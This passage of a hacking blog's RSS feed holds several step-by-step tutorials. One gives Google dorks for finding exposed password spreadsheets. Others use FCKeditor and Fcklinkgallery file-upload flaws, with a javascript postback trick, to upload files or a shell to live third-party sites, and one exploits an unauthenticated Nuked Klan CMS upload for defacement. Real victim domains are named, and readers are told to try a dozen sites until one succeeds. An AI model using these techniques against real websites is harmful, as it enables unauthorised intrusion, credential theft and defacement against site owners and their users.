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" alt="Exploiting Passwords stored on Websites with Google Dork 4" width="274" height="184" title="Exploiting Passwords stored on Websites with Google Dork 6"/>The instructions below will help you find the user password easily through google search engine and keywords</p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> of the <span style="color: #008080;">AnonyViet </span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietchat" class="local-link" rel="noopener">Link</a></span>  👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<p>You guys come in<a target="_blank" href="https://en.anonyviet.com/next-link/?url=http%3A%2F%2Fgoogle.com.vn" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';"> http://google.com.vn</a>type the command below:</p>
<pre class="lang:default decode:true">inurl:wp-content/uploads filetype:xls | filetype:xlsx password</pre>
<p>Google will list us the excel files that store user passwords.</p>
<p>My simple task is to download the excel file and open it to see :))</p>
<p>Good luck with your hacking!</p>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;1009&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;100&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 5\/5 - (100 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>            The article achieved: 5/5 &#8211; (100 votes)    </p>
</p></div>
<p><!-- AI CONTENT END 2 --></p></div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/exploiting-passwords-stored-on-websites-with-google-dork/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2015/12/login-username-password.jpeg" medium="image"></media:content>
            	</item>
		<item>
		<title>Instructions for exploiting FCK errors on the Website</title>
		<link>https://en.anonyviet.com/instructions-for-exploiting-fck-errors-on-the-website/</link>
					<comments>https://en.anonyviet.com/instructions-for-exploiting-fck-errors-on-the-website/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Tue, 31 Jan 2023 22:08:04 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[errors]]></category>
		<category><![CDATA[exploiting]]></category>
		<category><![CDATA[FCK]]></category>
		<category><![CDATA[Instructions]]></category>
		<category><![CDATA[Website]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=7586</guid>

					<description><![CDATA[The error FCKeditor (referred to as FCK) was discovered about 4 years ago, today Ad happened to try again and it turned out that there are still many unfixed sites, including some Vietnamese sites. Join the channel Telegram of the AnonyViet 👉 Link 👈 Exploiting the FCK error on the Website helps us to upload [&#8230;]]]></description>
										<content:encoded><![CDATA[<p></p>
<div>
<p>The error FCKeditor (referred to as FCK) was discovered about 4 years ago, today Ad happened to try again and it turned out that there are still many unfixed sites, including some Vietnamese sites.</p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> of the <span style="color: #008080;">AnonyViet </span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietchat" class="local-link" rel="noopener">Link</a></span>  👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<p>Exploiting the FCK error on the Website helps us to upload any file to the victim&#8217;s Web without Admin rights.</p>
<p>Today I will guide you to exploit this error, note, some sites go to the right path but can&#8217;t be uploaded because the website admin has fixed it, so I should find another site to exploit.</p>
<p>This article is for educational and research purposes only.  You do not take advantage to destroy or damage the reputation of other people&#8217;s Website</p>
<p>How to proceed:</p>
<p><strong>Step 1:</strong> Go to Google and type the command</p>
<pre class="lang:default decode:true">inurl:fckeditor/editor/filemanager/connectors/uploadtest.html</pre>
<p>Or click the link below for quick: <a target="_blank" href="https://en.anonyviet.com/next-link/?url=http%3A%2F%2Fadf.ly%2F1UheXd" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">FCK . mining link</a></p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2016%2F01%2F1-1.png" rel="attachment wp-att-1089 noopener" class="local-link"><img decoding="async" class="alignnone wp-image-1089 size-full" src="https://anonyviet.com/wp-content/uploads/2016/01/1-1.png" alt="first" width="780" height="232" srcset="https://anonyviet.com/wp-content/uploads/2016/01/1-1.png 780w, https://anonyviet.com/wp-content/uploads/2016/01/1-1-300x89.png 300w, https://anonyviet.com/wp-content/uploads/2016/01/1-1-768x228.png 768w, https://anonyviet.com/wp-content/uploads/2016/01/1-1-750x223.png 750w" sizes="(max-width: 780px) 100vw, 780px" title="Instructions for exploiting FCK errors on Website 9"/></a></p>
<p><strong>Step 2:</strong> Go to one of the Websites listed by Google, to conduct error exploitation</p>
<p>VD: <a target="_blank" href="https://en.anonyviet.com/next-link/?url=http%3A%2F%2Fadf.ly%2F1Uhh1r" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">http://www.livegaya.com/public/fckeditor/editor/filemanager/connectors/</a></p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2016%2F01%2F2-1.jpg" rel="attachment wp-att-1090 noopener" class="local-link"><img decoding="async" loading="lazy" class="size-full wp-image-1090 aligncenter" src="https://anonyviet.com/wp-content/uploads/2016/01/2-1.jpg" alt="2" width="602" height="326" title="Instructions for exploiting FCK errors on Website 10"/></a></p>
<p><strong>Step 3:</strong></p>
<p>Click on the link uploadtest.html</p>
<p>There will be an upload table here</p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=http%3A%2F%2Fadf.ly%2F1Uhh42" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">http://www.livegaya.com/public/fckeditor/editor/filemanager/connectors/uploadtest.html</a></p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2016%2F01%2F3-1.png" rel="attachment wp-att-1091 noopener" class="local-link"><img decoding="async" loading="lazy" class="size-full wp-image-1091 aligncenter" src="https://anonyviet.com/wp-content/uploads/2016/01/3-1.png" alt="3" width="1276" height="330" srcset="https://anonyviet.com/wp-content/uploads/2016/01/3-1.png 1276w, https://anonyviet.com/wp-content/uploads/2016/01/3-1-300x78.png 300w, https://anonyviet.com/wp-content/uploads/2016/01/3-1-1024x265.png 1024w, https://anonyviet.com/wp-content/uploads/2016/01/3-1-768x199.png 768w, https://anonyviet.com/wp-content/uploads/2016/01/3-1-750x194.png 750w, https://anonyviet.com/wp-content/uploads/2016/01/3-1-1140x295.png 1140w" sizes="auto, (max-width: 1276px) 100vw, 1276px" title="Instructions for exploiting FCK errors on Website 11"/></a></p>
<p><span style="text-decoration: underline;"><strong>Note:</strong></span></p>
<ul>
<li><strong>Select the “File Uploader” to use:</strong> Choose PHP</li>
<li><strong>Upload a new file:</strong> Upload a txt file to see.  In the picture I will upload the file hacked.txt</li>
<li>Press<strong> Send it to Server</strong> to upload</li>
</ul>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2016%2F01%2F5-1.png" rel="attachment wp-att-1092 noopener" class="local-link"><img decoding="async" loading="lazy" class="alignnone size-full wp-image-1092" src="https://anonyviet.com/wp-content/uploads/2016/01/5-1.png" alt="5" width="1095" height="316" srcset="https://anonyviet.com/wp-content/uploads/2016/01/5-1.png 1095w, https://anonyviet.com/wp-content/uploads/2016/01/5-1-300x87.png 300w, https://anonyviet.com/wp-content/uploads/2016/01/5-1-1024x296.png 1024w, https://anonyviet.com/wp-content/uploads/2016/01/5-1-768x222.png 768w, https://anonyviet.com/wp-content/uploads/2016/01/5-1-750x216.png 750w" sizes="auto, (max-width: 1095px) 100vw, 1095px" title="Instructions for exploiting FCK errors on Website 12"/></a></p>
<p><strong>Uploaded File URL:</strong> This is the file path that has been uploaded to the Website.</p>
<p>So my newly uploaded file will have the path as:</p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=http%3A%2F%2Fadf.ly%2F1Uhh5v" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">http://www.livegaya.com/userfiles/hacked.txt</a></p>
<p style="text-align: right;">Good luck!</p>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;1088&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;100&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 5\/5 - (100 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>            The article achieved: 5/5 &#8211; (100 votes)    </p>
</p></div>
<p><!-- AI CONTENT END 2 --></p></div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/instructions-for-exploiting-fck-errors-on-the-website/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2016/01/hacker.jpg" medium="image"></media:content>
            	</item>
		<item>
		<title>Exploiting Fcklinkgallery error to Upload files</title>
		<link>https://en.anonyviet.com/exploiting-fcklinkgallery-error-to-upload-files/</link>
					<comments>https://en.anonyviet.com/exploiting-fcklinkgallery-error-to-upload-files/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Tue, 31 Jan 2023 16:07:41 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[error]]></category>
		<category><![CDATA[exploiting]]></category>
		<category><![CDATA[Fcklinkgallery]]></category>
		<category><![CDATA[files]]></category>
		<category><![CDATA[Upload]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=7440</guid>

					<description><![CDATA[Similar to Fckeditor, this FCK family has an additional half brother, Fcklinkgallery. Today I continue to guide you how to exploit Fcklinkgallery error to Upload File to any website. Join the channel Telegram of the AnonyViet 👉 Link 👈 Step 1: Use the browser Firefox Go to Google and type the command inurl:/tabid/36/language/en-US/Default.aspx or inurl:fcklinkgallery.aspx [&#8230;]]]></description>
										<content:encoded><![CDATA[<p></p>
<div>
<p>Similar to Fckeditor, this FCK family has an additional half brother, Fcklinkgallery.  Today I continue to guide you how to exploit Fcklinkgallery error to Upload File to any website.</p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> of the <span style="color: #008080;">AnonyViet </span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietchat" class="local-link" rel="noopener">Link</a></span>  👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<p><b>Step 1: Use the browser <span style="color: #0000ff;">Firefox</span> Go to Google and type the command</b></p>
</p>
<pre class="lang:default decode:true">inurl:/tabid/36/language/en-US/Default.aspx</pre>
<p>or</p>
<pre class="lang:default decode:true">inurl:fcklinkgallery.aspx</pre>
<p>or</p>
<pre class="lang:default decode:true">inurl:/portals/0</pre>
<p>The fastest way is to go to the links below</p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=http%3A%2F%2Fadf.ly%2F1V5DXj" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">Link 1</a></p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=http%3A%2F%2Fadf.ly%2F1V5DcA" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">Link 2</a></p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link/?url=http%3A%2F%2Fadf.ly%2F1V5Dft" rel="noopener external nofollow" class="ext-link" onclick="this.target='_blank';">Link 3</a></p>
<p><img decoding="async" class="alignnone size-full wp-image-1236" src="https://anonyviet.com/wp-content/uploads/2016/01/1-4.png" alt="first" width="823" height="413" srcset="https://anonyviet.com/wp-content/uploads/2016/01/1-4.png 823w, https://anonyviet.com/wp-content/uploads/2016/01/1-4-300x151.png 300w, https://anonyviet.com/wp-content/uploads/2016/01/1-4-768x385.png 768w, https://anonyviet.com/wp-content/uploads/2016/01/1-4-360x180.png 360w, https://anonyviet.com/wp-content/uploads/2016/01/1-4-750x376.png 750w" sizes="(max-width: 823px) 100vw, 823px" title="Exploiting Fcklinkgallery error to Upload files 10"/></p>
<p><strong>Step 2:</strong></p>
<p>Select any sites to access and change the path to</p>
<p>http://namewebsite.com/<span style="color: #0000ff;"><strong>Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx</strong></span></p>
<p><strong>Step 3:</strong><br />If this table appears, then 50% success</p>
<p><img decoding="async" loading="lazy" class="alignnone size-full wp-image-1237" src="https://anonyviet.com/wp-content/uploads/2016/01/2-4.png" alt="2" width="366" height="268" srcset="https://anonyviet.com/wp-content/uploads/2016/01/2-4.png 366w, https://anonyviet.com/wp-content/uploads/2016/01/2-4-300x220.png 300w" sizes="auto, (max-width: 366px) 100vw, 366px" title="Exploiting Fcklinkgallery error to Upload file 11"/></p>
<p><strong>Step 4:</strong></p>
<p>Check the 3rd line File (Un File di questo sito)</p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2016%2F01%2F333.png" rel="attachment wp-att-1243 noopener" class="local-link"><img decoding="async" loading="lazy" class="alignnone size-full wp-image-1243" src="https://anonyviet.com/wp-content/uploads/2016/01/333.png" alt="333" width="400" height="316" srcset="https://anonyviet.com/wp-content/uploads/2016/01/333.png 400w, https://anonyviet.com/wp-content/uploads/2016/01/333-300x237.png 300w" sizes="auto, (max-width: 400px) 100vw, 400px" title="Exploiting Fcklinkgallery error to Upload file 12"/></a></p>
<p><strong>Step 5:</strong> Delete all text in the address bar of the browser, paste this script and press Enter</p>
<pre class="lang:default decode:true ">javascript:__doPostBack('ctlURL$cmdUpload','')</pre>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2016%2F01%2Fjs.png" rel="attachment wp-att-1242 noopener" class="local-link"><img decoding="async" loading="lazy" class="alignnone size-full wp-image-1242" src="https://anonyviet.com/wp-content/uploads/2016/01/js.png" alt="js" width="584" height="97" srcset="https://anonyviet.com/wp-content/uploads/2016/01/js.png 584w, https://anonyviet.com/wp-content/uploads/2016/01/js-300x50.png 300w" sizes="auto, (max-width: 584px) 100vw, 584px" title="Exploiting Fcklinkgallery error to Upload file 13"/></a></p>
<p><strong>Step 6: </strong>Below will appear a frame for us to upload the file.  Press<strong> Browse</strong>… to select the file (shell) to upload</p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2016%2F01%2F4444.png" rel="attachment wp-att-1244 noopener" class="local-link"><img decoding="async" loading="lazy" class="alignnone size-full wp-image-1244" src="https://anonyviet.com/wp-content/uploads/2016/01/4444.png" alt="4444" width="400" height="316" srcset="https://anonyviet.com/wp-content/uploads/2016/01/4444.png 400w, https://anonyviet.com/wp-content/uploads/2016/01/4444-300x237.png 300w" sizes="auto, (max-width: 400px) 100vw, 400px" title="Exploiting Fcklinkgallery error to Upload files 14"/></a></p>
<p><strong>Step 7: Upload whatever you want, hee</strong></p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2016%2F01%2F1-4.png" rel="attachment wp-att-1236 noopener"><br /></a>If you can&#8217;t do it once, find another website to do it, try about a dozen of them and you will get 1.<a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2016%2F01%2F2-4.png" rel="attachment wp-att-1237 noopener"><br /></a>Whatever you do, you need to be patient</p>
<div class="kk-star-ratings kksr-auto kksr-align-right kksr-valign-bottom" data-payload="{&quot;align&quot;:&quot;right&quot;,&quot;id&quot;:&quot;1235&quot;,&quot;slug&quot;:&quot;default&quot;,&quot;valign&quot;:&quot;bottom&quot;,&quot;ignore&quot;:&quot;&quot;,&quot;reference&quot;:&quot;auto&quot;,&quot;class&quot;:&quot;&quot;,&quot;count&quot;:&quot;100&quot;,&quot;legendonly&quot;:&quot;&quot;,&quot;readonly&quot;:&quot;&quot;,&quot;score&quot;:&quot;5&quot;,&quot;starsonly&quot;:&quot;&quot;,&quot;best&quot;:&quot;5&quot;,&quot;gap&quot;:&quot;5&quot;,&quot;greet&quot;:&quot;\u0110\u00e1nh gi\u00e1 b\u00e0i vi\u1ebft post&quot;,&quot;legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: 5\/5 - (100 b\u00ecnh ch\u1ecdn)&quot;,&quot;size&quot;:&quot;24&quot;,&quot;width&quot;:&quot;142.5&quot;,&quot;_legend&quot;:&quot;B\u00e0i vi\u1ebft \u0111\u1ea1t: {score}\/{best} - ({count} {votes})&quot;,&quot;font_factor&quot;:&quot;1.25&quot;}">
<p>            The article achieved: 5/5 &#8211; (100 votes)    </p>
</p></div>
<p><!-- AI CONTENT END 2 --></p></div>
]]></content:encoded>
					
					<wfw:commentRss>https://en.anonyviet.com/exploiting-fcklinkgallery-error-to-upload-files/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
		<media:content url="https://anonyviet.com/wp-content/uploads/2016/01/shutterstock_135704405-680x400.jpg" medium="image"></media:content>
            	</item>
		<item>
		<title>Instructions for exploiting CMS Upload Website error 2017</title>
		<link>https://en.anonyviet.com/instructions-for-exploiting-cms-upload-website-error-2017/</link>
					<comments>https://en.anonyviet.com/instructions-for-exploiting-cms-upload-website-error-2017/#respond</comments>
		
		<dc:creator><![CDATA[AnonyViet]]></dc:creator>
		<pubDate>Mon, 30 Jan 2023 12:01:45 +0000</pubDate>
				<category><![CDATA[Security]]></category>
		<category><![CDATA[Cms]]></category>
		<category><![CDATA[error]]></category>
		<category><![CDATA[exploiting]]></category>
		<category><![CDATA[Instructions]]></category>
		<category><![CDATA[Upload]]></category>
		<category><![CDATA[Website]]></category>
		<guid isPermaLink="false">https://en.anonyviet.com/?p=6767</guid>

					<description><![CDATA[Today I will guide you to exploit the Upload error of Nuked Klan CMSwith this error you can Upload File to this Website without any Admin rights, very suitable for anyone who likes to play Deface game Join the channel Telegram of the AnonyViet 👉 Link 👈 Publisher: https://github.com/Nuked-Klan/CMS_Nuked-KlanError in: Version 1.9Mining direction: no permissions [&#8230;]]]></description>
										<content:encoded><![CDATA[<p></p>
<div>
<p><strong>Today I will guide you to exploit the Upload error of <span style="color: #008000;">Nuked Klan CMS</span>with this error you can Upload File to this Website without any Admin rights, very suitable for anyone who likes to play Deface game</strong></p>
<div class="code-block code-block-16" style="margin: 8px 0; clear: both;">
<div align="center">
<table class=" aligncenter" style="background-color: #c0c0c0; border-collapse: collapse; width: 59.9985%;">
<tbody>
<tr>
<td style="width: 100%; text-align: center;"><span style="font-size: 12pt;"><strong>Join the channel <span style="color: #0000ff;">Telegram</span> of the <span style="color: #008080;">AnonyViet </span> 👉 <span style="text-decoration: underline;"><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Ft.me%2Fanonyvietchat" class="local-link" rel="noopener">Link</a></span>  👈</strong></span></td>
</tr>
</tbody>
</table>
</div>
</div>
<p><strong>Publisher:</strong> https://github.com/Nuked-Klan/CMS_Nuked-Klan<br /><strong>Error in:</strong> Version 1.9<br /><strong>Mining direction:</strong> no permissions for the Upload folder</p>
<p>Into the <span style="color: #008000;"><strong>Google</strong> </span>Type the command below into the search box (with a &#8216; &#8216; sign)</p>
<pre class="lang:default decode:true ">index of:"filemanager/dialog.php"</pre>
</p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2017%2F01%2F1-3.png" rel="noopener" class="local-link"><img decoding="async" class="aligncenter wp-image-3477" src="https://anonyviet.com/wp-content/uploads/2017/01/1-3.png" alt="Guide to exploiting CMS Upload Website 2017 error 9" width="523" height="106" srcset="https://anonyviet.com/wp-content/uploads/2017/01/1-3.png 787w, https://anonyviet.com/wp-content/uploads/2017/01/1-3-300x61.png 300w, https://anonyviet.com/wp-content/uploads/2017/01/1-3-768x156.png 768w, https://anonyviet.com/wp-content/uploads/2017/01/1-3-750x152.png 750w" sizes="(max-width: 523px) 100vw, 523px" title="Guide to exploiting CMS Upload Website error 2017 12"/></a></p>
<p>Choose 1 of the Websites listed under the search results, should choose the link with the word <strong>dialog.php</strong> bold, here I will choose the page <strong><span style="color: #800080;">mygolfballdrop.com/static/plugins/filemanager</span></strong> to mine</p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2017%2F01%2F2-2.png" rel="noopener" class="local-link"><img decoding="async" loading="lazy" class="aligncenter wp-image-3478" src="https://anonyviet.com/wp-content/uploads/2017/01/2-2.png" alt="Instructions for exploiting CMS Upload Website error 2017 10" width="454" height="299" srcset="https://anonyviet.com/wp-content/uploads/2017/01/2-2.png 618w, https://anonyviet.com/wp-content/uploads/2017/01/2-2-300x198.png 300w" sizes="auto, (max-width: 454px) 100vw, 454px" title="Instructions for exploiting CMS Upload Website error 2017 13"/></a></p>
<p>When you click on the Website you will be listed the Files and Folders as shown below, continue to Click on the file<strong> dialog.php</strong></p>
<p><a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2017%2F01%2F3-2.png" rel="noopener"><br /></a> <a target="_blank" href="https://en.anonyviet.com/next-link?url=https%3A%2F%2Fanonyviet.com%2Fwp-content%2Fuploads%2F2017%2F01%2F4-1.jpg" rel="noopener" class="local-link"><img decoding="async" loading="lazy" class="aligncenter size-full wp-image-3480" src="https://anonyviet.com/wp-content/uploads/2017/01/4-1.jpg" alt="Instructions for exploiting CMS Upload Website error 2017 11" width="492" height="340" srcset="https://anonyviet.com/wp-content/uploads/2017/01/4-1.jpg 492w, https://anonyviet.com/wp-content/uploads/2017/01/4-1-300x207.jpg 300w" sizes="auto, (max-width: 492px) 100vw, 492px" title="Guide to exploiting CMS Upload Website error 2017 14"/></a></p>
</p>
